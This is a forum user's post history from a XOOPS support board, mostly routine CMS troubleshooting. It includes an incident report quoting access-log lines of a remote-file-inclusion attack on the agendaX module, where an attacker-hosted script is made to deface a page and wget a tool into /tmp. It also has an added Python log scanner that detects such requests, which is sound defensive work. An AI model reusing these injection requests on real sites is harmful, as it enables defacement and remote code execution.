1
phaelon
Re: Hacked, where in Xoops did they gain entry???
  • 2005/4/8 5:30

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


Thanks for all the help. Any idea what he did with the following GET command? He executed wget so he was trying to webget something and download it into the directory, but I can't tell if it failed or not. He/she ran this same command 3 times. I also searched for any files named r0nin and any connections in those folders and found nothing.

201.255.96.220 - - [06/Apr/2005:20:00:03 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=cd%20/tmp%20wget%20http://users.cjb.net/kbyt3/r0nin HTTP/1.1" 200 1841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Thanks,
andy



2
phaelon
Re: Hacked, where in Xoops did they gain entry???
  • 2005/4/7 20:29



Yeah, that's kind of what I was trying to hint at as far as XOOPS being bypassed. This module was re-enabled to be used for keeping track of raids, and I saw the version but I assumed the updates I did a few months ago from 2.0 to 2.7 fixed it. Note to the wise to never assume.

I disabled, uninstalled the module and then deleted the agendaX directory within a minute of seeing that GET statement. So it's cool from that standpoint. I'll install the newest calendar tonight.

Thanks for all your help guys, and sorry I lost faith and blamed xoops, it must be the horror days from PHPnuke that pushed me towards blaming the engine.

Two things, first every time I add that command to the .htaccess file I get the 500 error. It's the only thing in the file too so I don't know what's going on with that.
Second, you mentioned server log analysis. Does XOOPS do this or do you mean through the Protect module? I look at the hosting logs about 1 time a week as is.



3
phaelon
Re: Hacked, where in Xoops did they gain entry???
  • 2005/4/7 19:22



Looking through my Raw access logs I found this. So it basically looks like he gained access through the agenda Module.

201.255.96.220 - - [06/Apr/2005:19:56:02 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=echo%20KbyTe%20WaS%20heRe%20[www.kbyte.tk]>../../index.html HTTP/1.1" 200 1848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


The module in question has been shut down. Nifty way of hacking it though, don't you agree?
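
Added example, not part of the original posts: a Python check that scans Apache combined-format access logs for requests like the ones quoted above, where a query parameter's value is itself a remote URL, and decodes the remaining parameters. The sample lines, hosts and the function name `find_remote_includes` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log: host ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# A parameter whose decoded value starts with a URL scheme suggests remote file inclusion.
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs, .example hosts), same format as the thread's logs.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Apr/2005:19:56:02 -0700] "GET /modules/agendax/addevent.inc.php'
    '?agendax_path=http://attacker.example/sh.py?&cmd=echo%20test HTTP/1.1" 200 1848 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [06/Apr/2005:20:00:03 -0700] "GET /modules/agendax/addevent.inc.php'
    '?agendax_path=http://attacker.example/sh.py?&cmd=cd%20/tmp%20wget%20http://files.example/tool'
    ' HTTP/1.1" 200 1841 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [06/Apr/2005:20:01:10 -0700] "GET /modules/news/article.php?storyid=12'
    ' HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
]

def find_remote_includes(lines):
    """Return one finding per request that passes a URL as a query parameter value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path, _, query = m.group("target").partition("?")
        params = parse_qsl(query, keep_blank_values=True)  # also percent-decodes values
        remote = [name for name, value in params if REMOTE_VALUE.match(value)]
        if remote:
            findings.append({
                "host": m.group("host"), "time": m.group("time"), "path": path,
                # The status is the server's response to the request itself; it does
                # not show whether a command passed in another parameter succeeded.
                "status": int(m.group("status")),
                "remote_params": remote,
                "params": dict(params),
            })
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f["time"], f["host"], f["path"], f["remote_params"], f["params"])
```
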



4
phaelon
Re: Hacked, where in Xoops did they gain entry???
  • 2005/4/7 13:45



Yeap, I shouldn't have pointed the finger at Xoops. Looking through what little logs are available to me it's evident that it was the web server itself which was compromised.

A question about the protector module. In the security advisory part it says you disable global registers in the .htaccess file under your www root, however once I did that I got a 500 forbidden error when trying to open the page. Any ideas?



5
phaelon
Hacked, where in Xoops did they gain entry???
  • 2005/4/7 5:52



I have a site running XOOPS 2.73, which I was planning to update to 2.9 this weekend. It was hacked in the following manner.

In the default HTML folder an index.html file was placed stating "KbyTe WaS heRe [www.kbyte.tk]".

Are there any log files that will point me in the right direction to tracking how they hacked through Xoops? The password for the hosting company is 10 characters long and is a randomly generated password consisting of complex variables. Basically I know the hosting company's side was not hacked, which leaves only XOOPS left.

I know PHPnuke is very vulnerable to exploits, and doing some research I came across information that states they are a clan that hacks Nuke sites.
Here is the information I found doing a few searches on their clan.
Quote:

You are a part of the mass deface against sites with nuke
For information to visit www.kbyte.tk
To contact myself write to k3kbyte@gmail.com
Dedicated specially to coty and the members of Olimpus Klan and Icenetx Hack Team:
0o_Zyr Golden_o0
0o_Zeus_o0
0o_Adi_o0
0o_Yes_o0
0o_Rey_o0
0o_Snake_o0
0o_Dreamer_o0
0o_Neubius_o0
Gaper
Trew
Brio
Fieldy
Ralf
Cero


Are the same vulnerabilities that exist in Nuke present in xoops?

Any ideas on how I can find where they came in from?



6
phaelon
How do you prevent Khat from displaying pictures?
  • 2005/3/27 4:55



If a user uses the {img}{/img} tags, an image displays in the Khat block. How do I disable this functionality without breaking the IMG tags for the rest of the site?

Also, how do I change the font just in Khat?

Thanks!!



7
phaelon
[FIXED] view account brings up a blank page
  • 2004/11/29 12:49



All fixed, thanks for the help.



8
phaelon
view account brings up a blank page
  • 2004/11/24 19:59



When you are logged on and you try to "View Account" a blank webpage shows. If you click on another user you can view their account just fine. You can also view your account just fine unless you are logged in.

Any Ideas? Here are two PHP errors I get when I turn PHP Debug on.

Warning [PHP]: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/public_html/language/english/user.php:176) in file include/common.php line 186
Warning [PHP]: Cannot modify header information - headers already sent by (output started at /home/public_html/language/english/user.php:176) in file user.php line 59



9
phaelon
Users Can't log on
  • 2004/11/13 15:26



You enter your user name and password, and click login, it redirects you to the page that says "Thank you for logging in user X" Then it redirects you to the main page and you aren't logged in.

PHP_debug shows nothing weird in php code going on.

Something of note: when I turn SQL debugging on, no pop-up window opens showing the SQL call, so I wonder if there is a problem with the SQL call in user.php.

How do I get it back to allowing users to log in and actually be logged in?



10
phaelon
newBB - Poll button not displaying
  • 2004/10/30 18:02



I updated newBB from 1.0 to 2.0rc2 like the instructions said, but some of the options no longer display, and switching to a new theme the buttons for reply and edit still look the same as they did when the old theme was being used.

Do I need to dump the newbb files out of my cache?



